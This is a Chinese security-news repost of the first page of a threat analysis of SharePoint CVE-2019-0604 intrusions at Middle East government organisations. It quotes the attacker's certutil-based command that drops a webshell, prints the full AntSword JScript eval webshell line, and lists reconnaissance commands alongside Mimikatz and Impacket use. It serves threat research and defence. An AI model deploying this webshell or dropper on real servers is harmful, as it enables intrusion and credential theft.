欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

针对中东政府组织SharePoint攻击研究

来源:本站整理 作者:佚名 时间:2020-02-12 TAG: 我要投稿

2019年9月10日发现未知攻击者利用CVE-2019-0604 SharePoint漏洞在中​​东政府组织的网站上安装了多个Web Shell。这些Web Shell中有Github上免费提供的开源AntSword Web Shell。
综述
使用Shodan搜索可遭受CVE-2019-0604攻击的SharePoint版本的服务器,发现28,881台服务器部署了有漏洞版本的SharePoint。庞大的服务器数量和公开的利用漏洞代码表明CVE-2019-0604仍然是主要的攻击媒介。
通过webshel​​l,攻击者利用Mimikatz工具来转储凭据,并使用Impacket的atexec工具和凭据在其他系统上运行命令,从而横向转移。在2019年9月19日发现相同的Mimikatz上传到中东第二个国家的政府组织。这两个组织的Mimikatz属于同源,因为都是利用.NET编写的自定义加载程序。因此认定这两次入侵都是发自同一组织。
早在2019年4月首次发现Emissary Panda利用CVE-2019-0604在两个中东国家的政府组织的SharePoint服务器上安装Web Shell。与四月份的袭击相比,攻击者针对两个不同国家的政府组织利用相同的漏洞,但目前没有证据可以将此次攻击与4月Emissary Panda攻击联系起来。两次攻击之间相同之处包括利用一个共同的漏洞,相似的工具集和共同的政府受害者。
Exploiting CVE-2019-0604
2019年9月10日发现服务器向以下URL发送HTTP POST请求,可以确定是攻击者利用CVE-2019-0604攻击SharePoint服务器:
/_layouts/15/picker.aspx
攻击者请求时在SharePoint服务器上执行以下命令:
C:\Windows\System32\cmd.exe /c echo PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiBEZWJ1Zz0idHJ1ZSIgVHJhY2U9ImZhbHNlIiAlPg[..snip..] >
c:\programdata\cmd.txt & certutil -decode c:\programdata\cmd.txt C:\Program Files\Common Files\microsoft shared\Web Server
Extensions\14\TEMPLATE\LAYOUTS\c.aspx & certutil -decode c:\programdata\cmd.txt C:\Program Files\Common Files\microsoft shared\Web Server
Extensions\15\TEMPLATE\LAYOUTS\c.aspx & certutil -decode c:\programdata\cmd.txt C:\Program Files\Common Files\microsoft shared\Web Server
Extensions\16\TEMPLATE\LAYOUTS\c.aspx
上面的命令使用echo将base64编码数据写入名为cmd.txt的文本文件。 然后使用certutil应用程序将cmd.txt文件中的base64编码数据转换为三个不同的SharePoint相关文件夹中的c.aspx。 整个命令的结果将Awen asp.net Webshell保存到SharePoint服务器,并进一步与服务器进行交互。 利用此SharePoint漏洞进行部署的Awen Webshell的SHA256值为5d4628d4dd89f31236f8c56686925cbb1a9b4832f81c95a4300e64948afede21。
Awen Webshell
在c.aspx上观察到对Webshell的第一个HTTP GET请求是获得Webshell的修改版本。这个HTTP GET请求是攻击者在利用漏洞之后执行命令之前访问了webshell。 图1显示了Awen Webshell,除了设置命令提示符的路径和运行命令之外,它几乎没有其他功能。

攻击者使用图1中所示的Awen Web Shell运行各种命令在系统和网络上进行初始探索,包括用户帐户,文件和文件夹,特权组,远程系统和网络配置。 表1显示了发现的命令和部署到服务器的命令。 表1还显示了使用Awen webshell执行的命令之间的时间增量,以深入了解攻击者执行命令的速度。

AntSword Webshell
AntSword是一个模块化Web Shell,攻击者可以将其部署到受感染的服务器上。 客户端应用程序可使不同攻击者用浏览器进行交互。攻击者将脚本发送到目标执行时会使用AntSword Shell Manager与受感染服务器上的AntSword Webshell进行交互。 在此攻击中部署的bitreeview.aspx AntSword Webshell(SHA256:15ecb6ac6c637***b2114e6b21b5b18b0c9f5341ee74b428b70e17e64b7da55e)仅162个字节,并且包含以下内容:
%@ Page Language="Jscript"%
%
eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.
FromBase64String(Request.Item["Darr1R1ng"])),"unsafe"); %
从上面的代码中可以看到,AntSword Webshell除了运行AntSword Shell Manager提供的脚本外没有其他功能。上面的代码还说明攻击者在AntSword Shell Manager中创建了自定义的“编码器”,以便能够与上面的代码进行交互。
攻击者使用AntSword Webshell在受感染的服务器上运行各种命令。 以下是此webshell发出的初始命令列表:
whoami
query user
nltest /domain_Trusts
ping -n 1
ipconfig /all
net group /do
net group Exchange Servers /do
ing -n 1
ping -n 1
query user
ping操作表明攻击者试图获得对Microsoft Exchange服务器的访问权限,此外,第一次ping操作出现拼写错误,表明这些命令是手动输入而不是通过脚本发出的。 图2显示了AntSword Shell Manager应用程序中的终端界面,攻击者可以通过该界面发出命令。

攻击者使用了AntSword webshell将工具上传到服务器,特别是cURL,一款定制的Mimikatz,以及Impacket的wmiexec和atexec工具的变体。AntSword有一个FileManager界面,它提供了类似于Windows资源管理器的功能,攻击者可以在服务器上传和下载文件。图3显示了AntSword Shell管理器中的FileManager接口。

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载